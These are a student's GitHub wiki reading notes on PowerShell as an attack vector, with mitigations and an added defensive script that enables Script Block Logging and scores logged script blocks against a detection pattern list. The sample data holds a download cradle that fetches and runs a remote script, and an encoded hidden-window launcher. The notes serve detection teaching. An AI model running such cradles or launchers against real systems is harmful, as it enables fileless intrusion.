Class 26 Reading: Remote Code Execution - taylortommy23/401-Reading-Notes GitHub Wiki

You just got a new job as a Cyber Threat Analyst, how would you explain your role to a family member?

  • My goal is to identify vulnerabilities in our systems before they can be exploited by cybercriminals and to develop strategies to prevent future attacks. Essentially, I'm like a digital detective, working to protect our digital assets from harm.

Explain what makes PowerShell such an effective attack vector.

  • PowerShell is an effective attack vector because it is already installed and trusted on every modern Windows host, so an attacker does not need to drop a new binary. It exposes the full .NET framework and, through it, the Win32 API, so a script can download and run code entirely in memory without ever writing to disk (fileless execution). PowerShell Remoting over WinRM lets the same script run across many machines at once, and command-line switches such as -EncodedCommand, -NoProfile and -ExecutionPolicy Bypass make it easy to obfuscate payloads and sidestep execution-policy restrictions. Because administrators rely on it every day, malicious use blends in with legitimate activity.

What are two things you can do to mitigate attacks that leverage PowerShell?

  • Enforce Constrained Language Mode, which blocks the .NET and Win32 API calls that fileless tradecraft depends on, and enable Script Block Logging (PowerShell 5.0 and later), which records the de-obfuscated text of every script block as Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log. Constrained Language Mode is only a real control when an application control policy (WDAC or AppLocker) enforces it; set per session, it disappears as soon as the attacker opens a new session. Script Block Logging is detective rather than preventive, so the events need to be forwarded to a SIEM and alerted on.
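
The following is an added example, not part of the original reading notes. It enables Script Block Logging through the same registry keys the Group Policy setting writes, checks the current session's language mode, and scores logged script blocks (Event ID 4104) against a small set of patterns typical of PowerShell tradecraft. It assumes an elevated PowerShell 5.1 or later session on Windows; the pattern list, the `Test-SuspiciousScriptBlock` function and the three sample script-block strings are constructed for this example.

```powershell
# Added example (not from the original notes). Assumes an elevated PowerShell 5.1+
# session on Windows. The pattern list and the sample script blocks are constructed.

# 1. Enable Script Block Logging (same keys the Group Policy setting writes).
$sblKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
New-Item -Path $sblKey -Force | Out-Null
Set-ItemProperty -Path $sblKey -Name EnableScriptBlockLogging -Value 1 -Type DWord

# 2. Report the language mode of this session. "ConstrainedLanguage" only means
#    something if WDAC/AppLocker enforces it; otherwise a fresh session is FullLanguage.
"Current session language mode: $($ExecutionContext.SessionState.LanguageMode)"

# 3. Constructed patterns that recur in logged script blocks of common tradecraft.
$suspicious = @(
    'FromBase64String',
    'IEX|Invoke-Expression',
    'DownloadString|DownloadFile|Net\.WebClient',
    '-enc(odedcommand)?\s',
    '-nop\b|-noprofile',
    '-w(indowstyle)?\s+hidden',
    '-ep\s+bypass|ExecutionPolicy\s+Bypass',
    'Add-Type|\[Runtime\.InteropServices\.Marshal\]',   # P/Invoke, in-memory loads
    'Reflection\.Assembly\]::Load'
)

# Hypothetical helper: returns the matched patterns and a simple hit count.
function Test-SuspiciousScriptBlock {
    param([string]$Text)
    $hits = foreach ($p in $suspicious) { if ($Text -match $p) { $p } }
    [pscustomobject]@{ Score = @($hits).Count; Hits = @($hits); Text = $Text }
}

# 4. Real use: read Event ID 4104 from the Operational log. Properties[2] is the
#    ScriptBlockText field. The log is empty until logging is on and scripts have run.
$events = Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104
} -MaxEvents 500 -ErrorAction SilentlyContinue

$events | ForEach-Object { Test-SuspiciousScriptBlock -Text $_.Properties[2].Value } |
    Where-Object Score -ge 2 | Sort-Object Score -Descending | Format-Table Score, Hits

# 5. Constructed samples so the scoring can be seen on a host with no events yet.
#    The second and third lines are the shape of a download cradle and an encoded
#    launcher; the encoded string is just "IEX (New-Object" in UTF-16LE base64.
$sample = @(
    'Get-ChildItem C:\Users | Measure-Object',
    'IEX (New-Object Net.WebClient).DownloadString("http://198.51.100.7/a.ps1")',
    'powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA'
)
$sample | ForEach-Object { Test-SuspiciousScriptBlock -Text $_ } | Format-Table Score, Hits
```

On the constructed samples the first line scores 0, the download cradle scores 2 (IEX and DownloadString) and the encoded launcher scores 3 (-nop, -w hidden, -enc). The threshold of 2 in step 4 is deliberate: single hits such as Add-Type or ExecutionPolicy Bypass are common in legitimate administration, so a real deployment would tune the list and the threshold against the environment's baseline and ship the 4104 events to a SIEM rather than query them on the host.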